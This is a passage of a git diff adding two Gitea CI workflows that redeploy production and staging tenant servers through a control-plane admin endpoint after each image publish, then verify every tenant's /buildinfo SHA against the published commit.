never fires on a +# real publish-workspace-server-image completion, the follow-up +# triage PR should replace the trigger with a push-with-paths-filter +# on .gitea/workflows/publish-workspace-server-image.yml. Until +# then continue-on-error+dead-workflow doesn't break anything. +# + +# Auto-refresh prod tenant EC2s after every main merge. +# +# Why this workflow exists: publish-workspace-server-image builds and +# pushes a new platform-tenant : to ECR on every merge to main, +# but running tenants pulled their image once at boot and never re-pull. +# Users see stale code indefinitely. +# +# This workflow closes the gap by calling the control-plane admin +# endpoint that performs a canary-first, batched, health-gated rolling +# redeploy across every live tenant. Implemented in molecule-ai/ +# molecule-controlplane as POST /cp/admin/tenants/redeploy-fleet +# (feat/tenant-auto-redeploy, landing alongside this workflow). +# +# Registry: ECR (153263036946.dkr.ecr.us-east-2.amazonaws.com/ +# molecule-ai/platform-tenant). GHCR was retired 2026-05-07 during the +# Gitea suspension migration. The canary-verify.yml promote step now +# uses the same redeploy-fleet endpoint (fixes the silent-GHCR gap). +# +# Runtime ordering: +# 1. publish-workspace-server-image completes → new :staging- in ECR. +# 2. 
This workflow fires via workflow_run, calls redeploy-fleet with +# target_tag=staging-. No CDN propagation wait needed — +# ECR image manifest is consistent immediately after push. +# 3. Calls redeploy-fleet with canary_slug (if set) and a soak +# period. Canary proves the image boots; batches follow. +# 4. Any failure aborts the rollout and leaves older tenants on the +# prior image — safer default than half-and-half state. +# +# Rollback path: re-run this workflow with a specific SHA pinned via +# the workflow_dispatch input. That calls redeploy-fleet with +# target_tag=, re-pulling the older image on every tenant. + +on: + workflow_run: + workflows: ['publish-workspace-server-image'] + types: [completed] + branches: [main] +permissions: + contents: read + # No write scopes needed — the workflow hits an external CP endpoint, + # not the GitHub API. + +# Serialize redeploys so two rapid main pushes' redeploys don't overlap +# and cause confusing per-tenant SSM state. Without this, GitHub's +# implicit workflow_run queueing would *probably* serialize them, but +# the explicit block makes the invariant defensible. Mirrors the +# concurrency block on redeploy-tenants-on-staging.yml for shape parity. +# +# cancel-in-progress: false → aborting a half-rolled-out fleet would +# leave tenants stuck on whatever image they happened to be on when +# cancelled. Better to finish the in-flight rollout before starting +# the next one. +concurrency: + group: redeploy-tenants-on-main + cancel-in-progress: false + +env: + GITHUB_SERVER_URL: https://git.moleculesai.app + +jobs: + redeploy: + # Skip the auto-trigger if publish-workspace-server-image didn't + # actually succeed. workflow_run fires on any completion state; we + # don't want to redeploy against a half-built image. + # NOTE (Gitea port): workflow_dispatch trigger dropped; only the + # workflow_run path remains. + if: ${{ github.event.workflow_run.conclusion == 'success' }} + runs-on: ubuntu-latest + # Phase 3 (RFC #219 §1): surface broken workflows without blocking. + continue-on-error: true + timeout-minutes: 25 + steps: + - name: Note on ECR propagation + # ECR image manifests are consistent immediately after push — no + # CDN cache to wait for. The old GHCR-based workflow had a 30s + # sleep to avoid race conditions; ECR makes that unnecessary. + run: echo "ECR image available immediately after push — proceeding." + + - name: Compute target tag + id: tag + # Resolution order: + # 1. Operator-supplied input (workflow_dispatch with explicit + # tag) → used verbatim. Lets ops pin `latest` for emergency + # rollback to last canary-verified digest, or pin a specific + # `staging-` to roll back to a known-good build. + # 2. Default → `staging-`. The just-published + # digest. Bypasses the `:latest` retag path that's currently + # dead (canary-verify soft-skips without canary fleet, so + # the only thing retagging `:latest` today is the manual + # promote-latest.yml — last run 2026-04-28). Auto-trigger + # from workflow_run uses workflow_run.head_sha; manual + # dispatch with no input falls through to github.sha. 
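+        # Optional belt-and-suspenders, sketched only (not wired into this
+        # port): confirm the computed tag exists in ECR before calling
+        # redeploy-fleet, so a mistyped rollback tag fails here instead of
+        # mid-rollout. Assumes credentials with ecr:DescribeImages; HEAD_SHA
+        # is the step env defined below:
+        #
+        #   aws ecr describe-images --region us-east-2 \
+        #     --repository-name molecule-ai/platform-tenant \
+        #     --image-ids imageTag="staging-${HEAD_SHA:0:7}" >/dev/null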
+ env: + INPUT_TAG: ${{ inputs.target_tag }} + HEAD_SHA: ${{ github.event.workflow_run.head_sha || github.sha }} + run: | + set -euo pipefail + if [ -n "${INPUT_TAG:-}" ]; then + echo "target_tag=$INPUT_TAG" >> "$GITHUB_OUTPUT" + echo "Using operator-pinned tag: $INPUT_TAG" + else + SHORT="${HEAD_SHA:0:7}" + echo "target_tag=staging-$SHORT" >> "$GITHUB_OUTPUT" + echo "Using auto tag: staging-$SHORT (head_sha=$HEAD_SHA)" + fi + + - name: Call CP redeploy-fleet + # CP_ADMIN_API_TOKEN must be set as a repo/org secret on + # molecule-ai/molecule-core, matching the staging/prod CP's + # CP_ADMIN_API_TOKEN env. Stored in Railway, mirrored to this + # repo's secrets for CI. + env: + CP_URL: ${{ vars.CP_URL || 'https://api.moleculesai.app' }} + CP_ADMIN_API_TOKEN: ${{ secrets.CP_ADMIN_API_TOKEN }} + TARGET_TAG: ${{ steps.tag.outputs.target_tag }} + CANARY_SLUG: ${{ inputs.canary_slug || 'hongming' }} + SOAK_SECONDS: ${{ inputs.soak_seconds || '60' }} + BATCH_SIZE: ${{ inputs.batch_size || '3' }} + DRY_RUN: ${{ inputs.dry_run || false }} + run: | + set -euo pipefail + + if [ -z "${CP_ADMIN_API_TOKEN:-}" ]; then + echo "::error::CP_ADMIN_API_TOKEN secret not set — skipping redeploy" + echo "::notice::Set CP_ADMIN_API_TOKEN in repo secrets to enable auto-redeploy." + exit 1 + fi + + BODY=$(jq -nc \ + --arg tag "$TARGET_TAG" \ + --arg canary "$CANARY_SLUG" \ + --argjson soak "$SOAK_SECONDS" \ + --argjson batch "$BATCH_SIZE" \ + --argjson dry "$DRY_RUN" \ + '{ + target_tag: $tag, + canary_slug: $canary, + soak_seconds: $soak, + batch_size: $batch, + dry_run: $dry + }') + + echo "POST $CP_URL/cp/admin/tenants/redeploy-fleet" + echo " body: $BODY" + + HTTP_RESPONSE=$(mktemp) + HTTP_CODE_FILE=$(mktemp) + # Route -w into its own tempfile so curl's exit code (e.g. 56 + # on connection-reset, 22 on --fail-with-body 4xx/5xx) can't + # pollute the captured stdout. The previous inline-substitution + # shape produced "000000" on connection reset (curl wrote + # "000" via -w, then the inline echo-fallback appended another + # "000") — caught on the 2026-05-04 redeploy of sha 2b862f6. + # set +e/-e keeps the non-zero curl exit from tripping the + # outer pipeline. See lint-curl-status-capture.yml for the + # CI gate that pins this fix shape. + set +e + curl -sS -o "$HTTP_RESPONSE" -w '%{http_code}' \ + -m 1200 \ + -H "Authorization: Bearer $CP_ADMIN_API_TOKEN" \ + -H "Content-Type: application/json" \ + -X POST "$CP_URL/cp/admin/tenants/redeploy-fleet" \ + -d "$BODY" >"$HTTP_CODE_FILE" + set -e + # Stderr from curl (e.g. dial errors with -sS) goes to the runner + # log so operators can see WHY a connection failed. Stdout is + # captured to $HTTP_CODE_FILE because that's where -w writes. + HTTP_CODE=$(cat "$HTTP_CODE_FILE" 2>/dev/null || echo "000") + [ -z "$HTTP_CODE" ] && HTTP_CODE="000" + + echo "HTTP $HTTP_CODE" + cat "$HTTP_RESPONSE" | jq . || cat "$HTTP_RESPONSE" + + # Pretty-print per-tenant results in the job summary so + # ops can see which tenants were redeployed without drilling + # into the raw response. + { + echo "## Tenant redeploy fleet" + echo "" + echo "**Target tag:** \`$TARGET_TAG\`" + echo "**Canary:** \`$CANARY_SLUG\` (soak ${SOAK_SECONDS}s)" + echo "**Batch size:** $BATCH_SIZE" + echo "**Dry run:** $DRY_RUN" + echo "**HTTP:** $HTTP_CODE" + echo "" + echo "### Per-tenant result" + echo "" + echo '| Slug | Phase | SSM Status | Exit | Healthz | Error |' + echo '|------|-------|------------|------|---------|-------|' + jq -r '.results[]? 
| "| \(.slug) | \(.phase) | \(.ssm_status // "-") | \(.ssm_exit_code) | \(.healthz_ok) | \(.error // "-") |"' "$HTTP_RESPONSE" || true + } >> "$GITHUB_STEP_SUMMARY" + + if [ "$HTTP_CODE" != "200" ]; then + echo "::error::redeploy-fleet returned HTTP $HTTP_CODE" + exit 1 + fi + OK=$(jq -r '.ok' "$HTTP_RESPONSE") + if [ "$OK" != "true" ]; then + echo "::error::redeploy-fleet reported ok=false (see summary for which tenant halted the rollout)" + exit 1 + fi + echo "::notice::Tenant fleet redeploy reported ssm_status=Success — verifying actual image roll on each tenant..." + + # Stash the response for the verify step. $RUNNER_TEMP outlasts + # the step boundary; $HTTP_RESPONSE doesn't. + cp "$HTTP_RESPONSE" "$RUNNER_TEMP/redeploy-response.json" + + - name: Verify each tenant /buildinfo matches published SHA + # ROOT FIX FOR #2395. + # + # `redeploy-fleet`'s `ssm_status=Success` means "the SSM RPC + # didn't error" — NOT "the new image is running on the tenant." + # `:latest` lives in the local Docker daemon's image cache; if + # the SSM document does `docker compose up -d` without an + # explicit `docker pull`, the daemon serves the previously- + # cached digest and the container restarts on stale code. + # 2026-04-30 incident: hongmingwang's tenant reported + # ssm_status=Success at 17:00:53Z but kept serving pre-501a42d7 + # chat_files for 30+ min — the lazy-heal fix never reached the + # user despite green deploy + green redeploy. + # + # This step closes the gap by curling each tenant's /buildinfo + # endpoint (added in workspace-server/internal/buildinfo + + # /Dockerfile* GIT_SHA build-arg, this PR) and comparing the + # returned git_sha to the SHA the workflow expects. Mismatches + # fail the workflow, which is what `ok=true` should have + # guaranteed all along. + # + # When the redeploy was triggered by workflow_dispatch with a + # specific tag (target_tag != "latest"), the expected SHA may + # not equal ${{ github.sha }} — in that case we resolve via + # GHCR's manifest. For workflow_run (default :latest) the + # workflow_run.head_sha is the SHA that just published. + env: + EXPECTED_SHA: ${{ github.event.workflow_run.head_sha || github.sha }} + TARGET_TAG: ${{ steps.tag.outputs.target_tag }} + # Tenant subdomain template — slugs from the response are + # appended. Production CP issues `.moleculesai.app`; + # staging CP issues `.staging.moleculesai.app`. This + # workflow runs on main → prod CP → no `staging.` infix. + TENANT_DOMAIN: 'moleculesai.app' + run: | + set -euo pipefail + + EXPECTED_SHORT="${EXPECTED_SHA:0:7}" + if [ "$TARGET_TAG" != "latest" ] \ + && [ "$TARGET_TAG" != "$EXPECTED_SHA" ] \ + && [ "$TARGET_TAG" != "staging-$EXPECTED_SHORT" ]; then + # workflow_dispatch with a pinned tag that isn't the head + # SHA — operator is rolling back / pinning. Skip the + # verification because we don't have the expected SHA in + # this context (would need to crane-inspect the GHCR + # manifest, which is a follow-up). Failing-open here is + # safe: the operator chose the tag deliberately. + # + # `staging-` IS verified — it's the new + # auto-trigger default (see Compute target tag step) and + # the digest under that tag SHOULD match EXPECTED_SHA. + echo "::notice::target_tag=$TARGET_TAG (operator-pinned) — skipping per-tenant SHA verification." + exit 0 + fi + + RESP="$RUNNER_TEMP/redeploy-response.json" + if [ ! 
-s "$RESP" ]; then + echo "::error::redeploy-response.json missing or empty — verify step ran without a response to read" + exit 1 + fi + + # Pull only successfully-redeployed tenants. Any tenant that + # halted the rollout already failed the previous step, so we + # don't double-count them here. + mapfile -t SLUGS < <(jq -r '.results[]? | select(.healthz_ok == true) | .slug' "$RESP") + if [ ${#SLUGS[@]} -eq 0 ]; then + echo "::warning::No tenants reported healthz_ok — nothing to verify" + exit 0 + fi + + echo "Verifying ${#SLUGS[@]} tenant(s) against EXPECTED_SHA=${EXPECTED_SHA:0:7}..." + + # Two distinct failure modes — STALE (the #2395 bug class, hard-fail) + # vs UNREACHABLE (teardown race, soft-warn). See the staging variant's + # comment for the full rationale; same logic applies on prod even + # though prod has fewer ephemeral tenants — the asymmetry would be a + # gratuitous fork. + STALE_COUNT=0 + UNREACHABLE_COUNT=0 + STALE_LINES=() + UNREACHABLE_LINES=() + for slug in "${SLUGS[@]}"; do + URL="https://${slug}.${TENANT_DOMAIN}/buildinfo" + # 30s total: tenant just SSM-restarted, may still be coming + # up. Retry-on-empty rather than retry-on-status — we want + # to fail fast on "responded with wrong SHA", not "still + # warming up". + BODY=$(curl -sS --max-time 30 --retry 3 --retry-delay 5 --retry-connrefused "$URL" || true) + ACTUAL_SHA=$(echo "$BODY" | jq -r '.git_sha // ""' 2>/dev/null || echo "") + if [ -z "$ACTUAL_SHA" ]; then + UNREACHABLE_COUNT=$((UNREACHABLE_COUNT + 1)) + UNREACHABLE_LINES+=("| $slug | (no /buildinfo response) | ${EXPECTED_SHA:0:7} | ⚠ unreachable (likely teardown race) |") + continue + fi + if [ "$ACTUAL_SHA" = "$EXPECTED_SHA" ]; then + echo " $slug: ${ACTUAL_SHA:0:7} ✓" + else + STALE_COUNT=$((STALE_COUNT + 1)) + STALE_LINES+=("| $slug | ${ACTUAL_SHA:0:7} | ${EXPECTED_SHA:0:7} | ❌ stale |") + fi + done + + { + echo "" + echo "### Per-tenant /buildinfo verification" + echo "" + echo "Expected SHA: \`${EXPECTED_SHA:0:7}\`" + echo "" + if [ $STALE_COUNT -gt 0 ]; then + echo "**${STALE_COUNT} STALE tenant(s) — these did NOT pick up the new image despite ssm_status=Success:**" + echo "" + echo "| Slug | Actual /buildinfo SHA | Expected | Status |" + echo "|------|----------------------|----------|--------|" + for line in "${STALE_LINES[@]}"; do echo "$line"; done + echo "" + fi + if [ $UNREACHABLE_COUNT -gt 0 ]; then + echo "**${UNREACHABLE_COUNT} unreachable tenant(s) — likely teardown race (soft-warn, not failing):**" + echo "" + echo "| Slug | Actual /buildinfo SHA | Expected | Status |" + echo "|------|----------------------|----------|--------|" + for line in "${UNREACHABLE_LINES[@]}"; do echo "$line"; done + echo "" + fi + if [ $STALE_COUNT -eq 0 ] && [ $UNREACHABLE_COUNT -eq 0 ]; then + echo "All ${#SLUGS[@]} tenants returned matching SHA. ✓" + fi + } >> "$GITHUB_STEP_SUMMARY" + + if [ $UNREACHABLE_COUNT -gt 0 ]; then + echo "::warning::$UNREACHABLE_COUNT tenant(s) unreachable post-redeploy. Likely benign teardown race — CP healthz monitor catches real outages." + fi + + # Belt-and-suspenders sanity floor: same logic as the staging + # variant — see that file's comment for the full rationale. + # Floor only applies when fleet >= 4; below that, canary-verify + # is the actual gate. 
+ TOTAL_VERIFIED=${#SLUGS[@]} + if [ $TOTAL_VERIFIED -ge 4 ] && [ $UNREACHABLE_COUNT -gt $((TOTAL_VERIFIED / 2)) ]; then + echo "::error::$UNREACHABLE_COUNT of $TOTAL_VERIFIED tenant(s) unreachable — exceeds 50% threshold on a fleet large enough that this signals a real outage, not teardown race." + exit 1 + fi + + if [ $STALE_COUNT -gt 0 ]; then + echo "::error::$STALE_COUNT tenant(s) returned a stale SHA. ssm_status=Success was misleading — see job summary." + exit 1 + fi + + echo "::notice::Tenant fleet redeploy complete — all reachable tenants on ${EXPECTED_SHA:0:7} (${UNREACHABLE_COUNT} unreachable, soft-warned)." diff --git a/.gitea/workflows/redeploy-tenants-on-staging.yml b/.gitea/workflows/redeploy-tenants-on-staging.yml new file mode 100644 index 00000000..6243d3f9 --- /dev/null +++ b/.gitea/workflows/redeploy-tenants-on-staging.yml @@ -0,0 +1,356 @@ +name: redeploy-tenants-on-staging + +# Ported from .github/workflows/redeploy-tenants-on-staging.yml on 2026-05-11 per RFC +# internal#219 §1 sweep. Differences from the GitHub version: +# - Dropped `workflow_dispatch.inputs` (Gitea 1.22.6 parser rejects them +# per feedback_gitea_workflow_dispatch_inputs_unsupported). +# - Dropped `merge_group:` (no Gitea merge queue). +# - Dropped `environment:` blocks (Gitea has no environments). +# - Workflow-level env.GITHUB_SERVER_URL pinned per +# feedback_act_runner_github_server_url. +# - `continue-on-error: true` on each job (RFC §1 contract). +# - **Gitea workflow_run trigger limitation**: Gitea 1.22.6's support +# for the `workflow_run` event is partial. If this never fires on a +# real publish-workspace-server-image completion, the follow-up +# triage PR should replace the trigger with a push-with-paths-filter +# on .gitea/workflows/publish-workspace-server-image.yml. Until +# then continue-on-error+dead-workflow doesn't break anything. +# + +# Auto-refresh staging tenant EC2s after every staging-branch merge. +# +# Mirror of redeploy-tenants-on-main.yml, with the staging-CP host and +# the :staging-latest tag. Sister workflow exists for prod (rolls +# :latest after canary-verify). Both share the same shape — just +# different CP_URL + target_tag + admin token secret. +# +# Why this workflow exists: publish-workspace-server-image now builds +# on every staging-branch push (PR #2335), pushing +# platform-tenant:staging-latest to GHCR. Existing tenants pulled +# their image once at boot and never re-pull, so the new image just +# sits unused until the tenant is reprovisioned. +# +# This workflow closes the gap by calling staging-CP's +# /cp/admin/tenants/redeploy-fleet, which performs a canary-first, +# batched, health-gated SSM redeploy across every live staging tenant. +# Same endpoint shape as prod CP — only the host differs. +# +# Runtime ordering: +# 1. publish-workspace-server-image completes on staging branch → +# new :staging-latest in GHCR. +# 2. This workflow fires via workflow_run, waits 30s for GHCR's CDN +# to propagate the new tag. +# 3. Calls redeploy-fleet with no canary (staging IS canary; we don't +# need a sub-canary inside it). Soak still applies to the first +# tenant in case of bad-deploy detection. +# 4. Any failure aborts the rollout and leaves older tenants on the +# prior image — safer default than half-and-half state. +# +# Rollback path: re-run with workflow_dispatch + target_tag=staging- +# of a known-good build. 
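+# With the workflow_dispatch path dropped in this port, a manual rollback
+# amounts to calling the endpoint by hand. Illustrative shape only; field
+# names are taken from the request body built in the step below, and <sha>
+# is a placeholder, not a literal value:
+#
+#   curl -sS -X POST "https://staging-api.moleculesai.app/cp/admin/tenants/redeploy-fleet" \
+#     -H "Authorization: Bearer $CP_STAGING_ADMIN_API_TOKEN" \
+#     -H "Content-Type: application/json" \
+#     -d '{"target_tag":"staging-<sha>","canary_slug":"","soak_seconds":60,"batch_size":3,"dry_run":false}'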
+
+on:
+  workflow_run:
+    workflows: ['publish-workspace-server-image']
+    types: [completed]
+    branches: [staging]
+permissions:
+  contents: read
+  # No write scopes needed — the workflow hits an external CP endpoint,
+  # not the GitHub API.
+
+# Serialize per-branch so two rapid staging pushes' redeploys don't
+# overlap and cause confusing per-tenant SSM state. cancel-in-progress
+# is false because aborting a half-rolled-out fleet leaves tenants
+# stuck on whatever image they happened to be on when cancelled.
+concurrency:
+  group: redeploy-tenants-on-staging
+  cancel-in-progress: false
+
+env:
+  GITHUB_SERVER_URL: https://git.moleculesai.app
+
+jobs:
+  redeploy:
+    # Skip the auto-trigger if publish-workspace-server-image didn't
+    # actually succeed. workflow_run fires on any completion state; we
+    # don't want to redeploy against a half-built image.
+    # NOTE (Gitea port): workflow_dispatch trigger dropped; only the
+    # workflow_run path remains.
+    if: ${{ github.event.workflow_run.conclusion == 'success' }}
+    runs-on: ubuntu-latest
+    # Phase 3 (RFC #219 §1): surface broken workflows without blocking.
+    continue-on-error: true
+    timeout-minutes: 25
+    steps:
+      - name: Wait for GHCR tag propagation
+        # GHCR's edge cache takes ~15-30s to consistently serve the new
+        # :staging-latest manifest after the registry accepts the push.
+        # Same rationale as redeploy-tenants-on-main.yml.
+        run: sleep 30
+
+      - name: Call staging-CP redeploy-fleet
+        # CP_STAGING_ADMIN_API_TOKEN must be set as a repo/org secret
+        # on molecule-ai/molecule-core, matching staging-CP's
+        # CP_ADMIN_API_TOKEN env var (visible in Railway controlplane
+        # / staging environment). Stored separately from the prod
+        # CP_ADMIN_API_TOKEN so a leak of one doesn't auth the other.
+        env:
+          CP_URL: ${{ vars.STAGING_CP_URL || 'https://staging-api.moleculesai.app' }}
+          CP_STAGING_ADMIN_API_TOKEN: ${{ secrets.CP_STAGING_ADMIN_API_TOKEN }}
+          TARGET_TAG: ${{ inputs.target_tag || 'staging-latest' }}
+          CANARY_SLUG: ${{ inputs.canary_slug || '' }}
+          SOAK_SECONDS: ${{ inputs.soak_seconds || '60' }}
+          BATCH_SIZE: ${{ inputs.batch_size || '3' }}
+          DRY_RUN: ${{ inputs.dry_run || false }}
+        run: |
+          set -euo pipefail
+
+          # Schedule-vs-dispatch hardening (mirrors sweep-cf-orphans
+          # and sweep-cf-tunnels): hard-fail on auto-trigger when the
+          # secret is missing so a misconfigured-repo doesn't silently
+          # serve stale staging tenants. Soft-skip on operator dispatch.
+          if [ -z "${CP_STAGING_ADMIN_API_TOKEN:-}" ]; then
+            if [ "${{ github.event_name }}" = "workflow_dispatch" ]; then
+              echo "::warning::CP_STAGING_ADMIN_API_TOKEN secret not set — skipping redeploy"
+              echo "::warning::Set CP_STAGING_ADMIN_API_TOKEN in repo secrets to enable auto-redeploy."
+              echo "::notice::Pull the value from staging-CP's CP_ADMIN_API_TOKEN env in Railway."
+              exit 0
+            fi
+            echo "::error::staging redeploy cannot run — CP_STAGING_ADMIN_API_TOKEN secret missing"
+            echo "::error::set it at Settings → Secrets and Variables → Actions; pull from staging-CP's CP_ADMIN_API_TOKEN env in Railway."
+ exit 1 + fi + + BODY=$(jq -nc \ + --arg tag "$TARGET_TAG" \ + --arg canary "$CANARY_SLUG" \ + --argjson soak "$SOAK_SECONDS" \ + --argjson batch "$BATCH_SIZE" \ + --argjson dry "$DRY_RUN" \ + '{ + target_tag: $tag, + canary_slug: $canary, + soak_seconds: $soak, + batch_size: $batch, + dry_run: $dry + }') + + echo "POST $CP_URL/cp/admin/tenants/redeploy-fleet" + echo " body: $BODY" + + HTTP_RESPONSE=$(mktemp) + HTTP_CODE_FILE=$(mktemp) + # Route -w into its own tempfile so curl's exit code (e.g. 56 + # on connection-reset) can't pollute the captured stdout. The + # previous inline-substitution shape produced "000000" on + # connection reset — caught on main variant 2026-05-04 + # redeploying sha 2b862f6. Same fix shape as the synth-E2E + # §9c gate (PR #2797). See lint-curl-status-capture.yml for + # the CI gate that pins this fix shape. + set +e + curl -sS -o "$HTTP_RESPONSE" -w '%{http_code}' \ + -m 1200 \ + -H "Authorization: Bearer $CP_STAGING_ADMIN_API_TOKEN" \ + -H "Content-Type: application/json" \ + -X POST "$CP_URL/cp/admin/tenants/redeploy-fleet" \ + -d "$BODY" >"$HTTP_CODE_FILE" + set -e + # Stderr from curl (-sS shows dial errors etc.) goes to the + # runner log so operators can see WHY a connection failed. + HTTP_CODE=$(cat "$HTTP_CODE_FILE" 2>/dev/null || echo "000") + [ -z "$HTTP_CODE" ] && HTTP_CODE="000" + + echo "HTTP $HTTP_CODE" + cat "$HTTP_RESPONSE" | jq . || cat "$HTTP_RESPONSE" + + { + echo "## Staging tenant redeploy fleet" + echo "" + echo "**Target tag:** \`$TARGET_TAG\`" + echo "**Canary:** \`${CANARY_SLUG:-(none — staging is itself the canary)}\` (soak ${SOAK_SECONDS}s)" + echo "**Batch size:** $BATCH_SIZE" + echo "**Dry run:** $DRY_RUN" + echo "**HTTP:** $HTTP_CODE" + echo "" + echo "### Per-tenant result" + echo "" + echo '| Slug | Phase | SSM Status | Exit | Healthz | Error |' + echo '|------|-------|------------|------|---------|-------|' + jq -r '.results[]? | "| \(.slug) | \(.phase) | \(.ssm_status // "-") | \(.ssm_exit_code) | \(.healthz_ok) | \(.error // "-") |"' "$HTTP_RESPONSE" || true + } >> "$GITHUB_STEP_SUMMARY" + + # Distinguish "real fleet failure" from "E2E teardown race". + # + # CP returns HTTP 500 + ok=false whenever ANY tenant in the + # fleet failed SSM or healthz. In practice the recurring source + # of these is ephemeral test tenants being torn down by their + # parent E2E run mid-redeploy: the EC2 dies → SSM exit=2 or + # healthz timeout → CP marks the fleet failed → this workflow + # goes red even though every operator-facing tenant rolled fine. + # + # Ephemeral slug prefixes (kept in sync with sweep-stale-e2e-orgs.yml + # — see that file for the source-of-truth list and rationale): + # - e2e-* — canvas/saas/ext E2E suites + # - rt-e2e-* — runtime-test harness fixtures (RFC #2251) + # Long-lived prefixes that are NOT ephemeral and MUST hard-fail: + # demo-prep, dryrun-*, dryrun2-*, plus all human tenant slugs. + # + # Filter: if HTTP=500/ok=false AND every failed slug matches an + # ephemeral prefix, treat as soft-warn and let the verify step + # downstream handle unreachable-vs-stale (#2402). Any non-ephemeral + # failure or a non-500 HTTP response remains a hard failure. + OK=$(jq -r '.ok // "false"' "$HTTP_RESPONSE") + FAILED_SLUGS=$(jq -r ' + .results[]? 
+ | select((.healthz_ok != true) or (.ssm_status != "Success")) + | .slug' "$HTTP_RESPONSE" 2>/dev/null || true) + EPHEMERAL_PREFIX_RE='^(e2e-|rt-e2e-)' + NON_EPHEMERAL_FAILED=$(printf '%s\n' "$FAILED_SLUGS" | grep -v '^$' | grep -Ev "$EPHEMERAL_PREFIX_RE" || true) + + if [ "$HTTP_CODE" = "200" ] && [ "$OK" = "true" ]; then + : # happy path — fall through to verification + elif [ "$HTTP_CODE" = "500" ] && [ -z "$NON_EPHEMERAL_FAILED" ] && [ -n "$FAILED_SLUGS" ]; then + COUNT=$(printf '%s\n' "$FAILED_SLUGS" | grep -Ec "$EPHEMERAL_PREFIX_RE" || true) + echo "::warning::redeploy-fleet returned HTTP 500 but every failed tenant ($COUNT) is ephemeral (e2e-*/rt-e2e-*) — treating as teardown race, soft-warning." + printf '%s\n' "$FAILED_SLUGS" | sed 's/^/::warning:: failed: /' + elif [ "$HTTP_CODE" != "200" ]; then + echo "::error::redeploy-fleet returned HTTP $HTTP_CODE" + if [ -n "$NON_EPHEMERAL_FAILED" ]; then + echo "::error::non-ephemeral tenant(s) failed:" + printf '%s\n' "$NON_EPHEMERAL_FAILED" | sed 's/^/::error:: /' + fi + exit 1 + else + # HTTP=200 but ok=false (shouldn't happen with current CP + # but keep the gate for completeness). + echo "::error::redeploy-fleet reported ok=false (see summary for which tenant halted the rollout)" + exit 1 + fi + echo "::notice::Staging tenant fleet redeploy reported ssm_status=Success — verifying actual image roll on each tenant..." + + cp "$HTTP_RESPONSE" "$RUNNER_TEMP/redeploy-response.json" + + - name: Verify each staging tenant /buildinfo matches published SHA + # Mirror of the verify step in redeploy-tenants-on-main.yml — see + # there for the rationale (#2395 root fix). Staging has the same + # ssm_status-success-but-stale-image hazard and benefits from the + # same gate. Diff: TENANT_DOMAIN includes the `staging.` infix. + env: + EXPECTED_SHA: ${{ github.event.workflow_run.head_sha || github.sha }} + TARGET_TAG: ${{ inputs.target_tag || 'staging-latest' }} + TENANT_DOMAIN: 'staging.moleculesai.app' + run: | + set -euo pipefail + + # staging-latest is the staging-side moving tag; treat it the + # same way main treats `latest`. Operator-pinned SHAs skip + # verification (see main variant for why). + if [ "$TARGET_TAG" != "staging-latest" ] && [ "$TARGET_TAG" != "latest" ] && [ "$TARGET_TAG" != "$EXPECTED_SHA" ]; then + echo "::notice::target_tag=$TARGET_TAG (operator-pinned) — skipping per-tenant SHA verification." + exit 0 + fi + + RESP="$RUNNER_TEMP/redeploy-response.json" + if [ ! -s "$RESP" ]; then + echo "::error::redeploy-response.json missing or empty" + exit 1 + fi + + mapfile -t SLUGS < <(jq -r '.results[]? | select(.healthz_ok == true) | .slug' "$RESP") + if [ ${#SLUGS[@]} -eq 0 ]; then + echo "::warning::No staging tenants reported healthz_ok — nothing to verify" + exit 0 + fi + + echo "Verifying ${#SLUGS[@]} staging tenant(s) against EXPECTED_SHA=${EXPECTED_SHA:0:7}..." + + # Two distinct failure modes here: + # STALE_COUNT — tenant returned a SHA that doesn't match. THIS is + # the #2395 bug class: tenant up + serving old code. + # Always hard-fail the workflow. + # UNREACHABLE_COUNT — tenant didn't respond. Almost always a benign + # teardown race: redeploy-fleet snapshot says + # healthz_ok=true, then the E2E suite tears the + # ephemeral tenant down before this step runs (the + # e2e-* fixtures churn 5-10/hour on staging). Soft- + # warn so we don't block staging→main on cleanup. + # Real "tenant up but unreachable" is caught by CP's + # own healthz monitor + the post-redeploy alert; we + # don't need to double-count it here. 
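+          # Shape of the /buildinfo payload the loop below assumes; the field
+          # name comes from the jq filter, the value is illustrative and
+          # <slug> is a placeholder:
+          #
+          #   $ curl -sS https://<slug>.staging.moleculesai.app/buildinfo
+          #   {"git_sha":"0a1b2c3d4e5f60718293a4b5c6d7e8f901234567"}
+          #
+          #   jq -r '.git_sha // ""'   # full 40-char SHA, or "" when the body is empty or garbled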
+ STALE_COUNT=0 + UNREACHABLE_COUNT=0 + STALE_LINES=() + UNREACHABLE_LINES=() + for slug in "${SLUGS[@]}"; do + URL="https://${slug}.${TENANT_DOMAIN}/buildinfo" + BODY=$(curl -sS --max-time 30 --retry 3 --retry-delay 5 --retry-connrefused "$URL" || true) + ACTUAL_SHA=$(echo "$BODY" | jq -r '.git_sha // ""' 2>/dev/null || echo "") + if [ -z "$ACTUAL_SHA" ]; then + UNREACHABLE_COUNT=$((UNREACHABLE_COUNT + 1)) + UNREACHABLE_LINES+=("| $slug | (no /buildinfo response) | ${EXPECTED_SHA:0:7} | ⚠ unreachable (likely teardown race) |") + continue + fi + if [ "$ACTUAL_SHA" = "$EXPECTED_SHA" ]; then + echo " $slug: ${ACTUAL_SHA:0:7} ✓" + else + STALE_COUNT=$((STALE_COUNT + 1)) + STALE_LINES+=("| $slug | ${ACTUAL_SHA:0:7} | ${EXPECTED_SHA:0:7} | ❌ stale |") + fi + done + + { + echo "" + echo "### Per-tenant /buildinfo verification (staging)" + echo "" + echo "Expected SHA: \`${EXPECTED_SHA:0:7}\`" + echo "" + if [ $STALE_COUNT -gt 0 ]; then + echo "**${STALE_COUNT} STALE tenant(s) — these did NOT pick up the new image despite ssm_status=Success:**" + echo "" + echo "| Slug | Actual /buildinfo SHA | Expected | Status |" + echo "|------|----------------------|----------|--------|" + for line in "${STALE_LINES[@]}"; do echo "$line"; done + echo "" + fi + if [ $UNREACHABLE_COUNT -gt 0 ]; then + echo "**${UNREACHABLE_COUNT} unreachable tenant(s) — likely E2E teardown race (soft-warn, not failing):**" + echo "" + echo "| Slug | Actual /buildinfo SHA | Expected | Status |" + echo "|------|----------------------|----------|--------|" + for line in "${UNREACHABLE_LINES[@]}"; do echo "$line"; done + echo "" + fi + if [ $STALE_COUNT -eq 0 ] && [ $UNREACHABLE_COUNT -eq 0 ]; then + echo "All ${#SLUGS[@]} staging tenants returned matching SHA. ✓" + fi + } >> "$GITHUB_STEP_SUMMARY" + + if [ $UNREACHABLE_COUNT -gt 0 ]; then + echo "::warning::$UNREACHABLE_COUNT staging tenant(s) unreachable 